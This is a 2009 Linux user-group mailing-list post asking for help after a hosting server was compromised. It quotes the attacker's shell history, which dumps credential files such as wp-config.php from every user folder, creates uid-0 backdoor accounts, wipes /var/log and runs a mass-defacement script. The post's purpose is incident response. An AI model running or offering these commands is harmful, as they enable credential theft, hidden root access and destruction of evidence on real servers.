[GLLUG] server attack

Eduardo Cesconetto eduardo at cesconetto.com
Sun Sep 20 20:28:36 EDT 2009


A friend's hosting server is being attacked by somebody using mass.pl  
to change the index.html files in all the user folders, here part of a  
log:

cd ..
cat /home/*/public_html/configuration.php > hard.txt
useradd -o -u 0 sshdd
/usr/sbin/useradd -o -u 0 sshdd
passwd sshdd
/usr/sbin/useradd -o -u 0 apachee
passwd apachee
/usr/sbin/useradd -o -u 0 apach
passwd apach
/etc/init.d/sshd restart
/etc/init.d/sshd stop
/etc/init.d/sshd start
rm hard.txt
cat /home/*/public_html/config.php > hard.txt
ls -lia
rm hard.txt
cd ..
cat /home/*/public_html/config.php > hard.txt
rm hard.txt
cat /home/*/public_html/configuration.php > hard.txt
rm hard.txt
cat /home/*/public_html/wp-config.php > hard.txt
rm hard.txt
ls -lia /etc
ls /etc/valiases > hard.txt
rm hard.txt
ls -lia /etc/valiases > hard.txt
ls -lia /
rm -r var/log
rm -r /var/log
mkdir /var/log
ls -lia
crm user1
rm user1.php
cd cgi-bin
ls -lia
rm -r hard
cd ..
rm hard
cd cgi-bin
cd ..
rm hard.txt
cd cgi-bin
ls -lia
pwd
perl mass.pl
perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/ 
hard.html
perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/ 
hard.html
perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/ 
hard.html
[9/20/09 7:13:55 PM] konrath: encontrei isso ae em cima



any ideas on how to stop this?




More information about the linux-user mailing list